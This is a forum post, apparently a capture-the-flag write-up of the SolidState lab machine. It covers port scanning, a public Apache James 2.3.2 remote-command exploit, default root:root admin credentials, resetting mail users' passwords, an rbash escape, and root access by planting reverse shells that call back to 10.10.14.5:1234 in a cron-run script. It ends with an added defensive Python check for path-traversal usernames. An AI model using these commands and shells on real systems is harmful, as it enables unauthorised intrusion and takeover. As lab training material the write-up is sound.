Welcome to Hacking.BG!
Showing results for tags 'solidstate'.
Result 1, posted by h3xu:

SolidState

# ENUMERATION

## NMAP

The scan returned multiple interesting services.

```bash
# nmap -p- -sV -sC -o solidstate.txt --script vuln 10.10.10.51
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 05:47 EDT
Nmap scan report for 10.10.10.51
Host is up (0.050s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp   open  smtp        JAMES smtpd 2.3.2
| smtp-vuln-cve2010-4344:
|_  The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown:
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.51
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://10.10.10.51:80/
|     Form id: name
|     Form action: #
|
|     Path: http://10.10.10.51:80/index.html
|     Form id: name
|     Form action: #
|
|     Path: http://10.10.10.51:80/services.html
|     Form id: name
|     Form action: #
|
|     Path: http://10.10.10.51:80/about.html
|     Form id: name
|_    Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /README.txt: Interesting, a readme.
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'
|_http-server-header: Apache/2.4.25 (Debian)
| http-sql-injection:
|   Possible sqli for queries:
|     http://10.10.10.51:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/js/ie/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/js/ie/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/js/ie/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/js/ie/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/js/?C=D%3bO%3dD%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|_    http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
110/tcp  open  pop3        JAMES pop3d 2.3.2
|_sslv2-drown:
119/tcp  open  nntp        JAMES nntpd (posting ok)
|_sslv2-drown:
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Port 25 SMTP

We have an SMTP service running. This [VRFY EXPN RCPT - pentest monkey](https://www.ndchost.com/wiki/mail/test-smtp-auth-telnet) article explains how we could connect and test the SMTP service on port 25.

```bash
# telnet 10.10.10.51 25
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Thu, 15 Apr 2021 06:22:00 -0400 (EDT)
VRFY
502 5.3.3 VRFY is not supported
EXPN
502 5.3.3 EXPN is not supported
RCPT
503 5.5.0 Need MAIL before RCPT
```

Since the service does not support the first two protocols, we're going to use RCPT.

```bash
$ /usr/share/legion/scripts/smtp-user-enum.pl -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.10.10.51
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count ............. 1
Username count ........... 168
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Thu Apr 15 06:23:54 2021 #########
######## Scan completed at Thu Apr 15 06:24:02 2021 #########
0 results.

168 queries in 8 seconds (21.0 queries / sec)
```

I have also tried enumerating for email addresses by adding "-D 10.10.10.51" and "-D solid-state-security.com", but again with no success.

## Port 80 HTTP

The nmap scan reveals a web service running. Let's try to find hidden directories/files. The scan already reported some possibly interesting directories; however, upon checking them I did not find anything important.

#### Dirbuster

![[solidstate dirbuster.PNG]]

#### sqlmap

I have tested the js false-positive just for the sake of it, and proved that it is not injectable.

## Port 4555 tcp admin-James

#### Searchsploit

We can't help but notice that the exploits are for the same version as the one running on the machine.

```bash
# searchsploit JAMES
------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                            |  Path
------------------------------------------------------------------------------------------ ---------------------------------
Apache James Server 2.2 - SMTP Denial of Service                                          | multiple/dos/27915.pl
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)      | linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution                                      | linux/remote/35513.py
WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow                       | windows/remote/944.c
------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
```

The following picture is from the RCE python exploit. It seems the default credentials are root:root. Let's test it:

# Exploitation

![[Pasted image 20210415135840.png]]

```bash
$ python 35513.py 10.10.10.51                                                                                          1 ⨯
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
```

Now, in order to execute the payload, we need to find a way to log in to the machine. There is an SMTP service running and we know the default credentials root:root:

```bash
$ telnet 10.10.10.51 4555                                                                                           130 ⨯
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection
listusers
Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: root
user: thomas
user: john
user: mindy
user: mailadmin
setpassword mailadmin mailadmin
Password for mailadmin reset
exit
Unknown command exit
quit
Bye
Connection closed by foreign host.
```

Cool, I have logged onto the service by using default credentials, we understood what users exist, and we were able to change passwords. Now I am going to access the account for mailadmin, since it looks like the juiciest account.

1. Credentials mailadmin:mailadmin

   ![[Pasted image 20210415214145.png]]

2. It will prompt you with a window that says that it uses plain text and not encrypted. Confirm and continue.

3. Ok, apparently the mailadmin account was a waste of time, lol :D. Let's repeat the process for the rest of the accounts (click "set up another account") and hope we get something out of it.

   ```bash
   listusers
   Existing accounts 7
   user: james
   user: ../../../../../../../../etc/bash_completion.d
   user: root
   user: thomas
   user: john
   user: mindy
   user: mailadmin
   setpassword mindy mindy
   Password for mindy reset
   ```

4. Mindy's account has a welcome email and an access email which contains a password.

   ![[Pasted image 20210415214939.png]]

Ok, so upon logging in through ssh with the following credentials, mindy:P@55W0rd1!2@, the python exploit runs and a bash_completion file is created. However, we're put in an rbash shell.

```bash
$ ssh [email protected]
Received: from 10.10.14.5([10.10.14.5])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 902
          for <../../../../../../../../etc/bash_completion.d@localhost>;
          Thu, 15 Apr 2021 07:11:09 -0400 (EDT)
Date: Thu, 15 Apr 2021 07:11:09 -0400 (EDT)
From: [email protected]
$ whoami
-rbash: whoami: command not found
```

I have finally managed to escape the restrictive shell by adding "-t bash".

```bash
$ man ssh
</deleted>
     -t      Force pseudo-terminal allocation.  This can be used to execute arbitrary screen-based programs on a remote machine,
             which can be very useful, e.g. when implementing menu services.  Multiple -t options force tty allocation, even if
             ssh has no local tty.
</deleted>
```

```bash
ssh [email protected] -t bash
[email protected]'s password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls
bin  user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
```

# Privilege escalation

#### Enumeration

```bash
$ bash linenum.sh > output.txt
```

I did not manage to find anything interesting apart from some system ports that are open. The next script I'd like to try is probably unix-privesc-check from [pentestmonkey](http://pentestmonkey.net/tools/audit/unix-privesc-check); however, the box did not have strings, which is a requirement for it to run.

#### writeable files/directories

```bash
$ find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py
$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()
```

NICE! We have a root-owned file which we could modify and execute. Let's escalate.

Firstly, I have tried to get a reverse shell:

```bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ls
newfile.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cd opt
bash: cd: opt: No such file or directory
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cd /opt
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ nano tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ date
Thu Apr 15 16:04:56 EDT 2021
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('bash -c "sh -i >& /dev/udp/10.10.14.5/1234 0>&1"')
except:
     sys.exit()
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ date
Thu Apr 15 16:05:13 EDT 2021
```

I have proven to myself that cron executes the file every minute by writing into tmp.py:

```python
#!/usr/bin/env python
import os
import sys
try:
     os.system('touch /tmp/shell.py;python shell.py')
except:
     sys.exit()
```

After a while, a file was created in /tmp/. I have edited the file with the python script from the [reverse shell sentrywhale](https://sentrywhale.com/documentation/reverse-shell) website:

```python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.5",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
```

Catch the shell.

```bash
$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.51] 39694
bash: cannot set terminal process group (3597): Inappropriate ioctl for device
bash: no job control in this shell
root@solidstate:~# ls
ls
file.py
root.txt
```
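Added defensive example, not part of h3xu's post or of the James project: the account named `../../../../../../../../etc/bash_completion.d` in the `listusers` output above is the symptom of a mail store that turns user names into file paths without validation. The Python below parses a constructed copy of that output, flags names that fail an allowlist, and shows the containment check a repository should apply before creating a per-user directory; the repository root `/srv/james-constructed/inboxes` is an assumed placeholder.

```python
import os
import re

# Constructed sample modelled on the JAMES "listusers" output in the writeup above.
LISTUSERS_OUTPUT = """Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: root
user: thomas
user: john
user: mindy
user: mailadmin
"""

# Allowlist: a name starts with a letter or digit and may then contain only
# letters, digits, dot, underscore or dash. Path separators and leading dots
# are rejected before the name can ever become part of a file path.
SAFE_USERNAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def is_safe_username(name: str) -> bool:
    return bool(SAFE_USERNAME.match(name))


def parse_listusers(output: str) -> list:
    """Extract account names from the 'user: <name>' lines of the admin tool output."""
    return [line[len("user: "):] for line in output.splitlines() if line.startswith("user: ")]


def find_unsafe_accounts(output: str) -> list:
    """Return the account names in a listusers dump that fail the allowlist."""
    return [u for u in parse_listusers(output) if not is_safe_username(u)]


def safe_repo_path(base_dir: str, username: str):
    """Resolve the per-user mailbox path; return None if it would leave base_dir.

    Both sides are passed through realpath so symlinks and '..' segments are
    normalised before the containment comparison.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, username))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    repo = "/srv/james-constructed/inboxes"  # assumed placeholder repository root
    for user in parse_listusers(LISTUSERS_OUTPUT):
        print(f"{user!r}: allowlisted={is_safe_username(user)} path={safe_repo_path(repo, user)}")
```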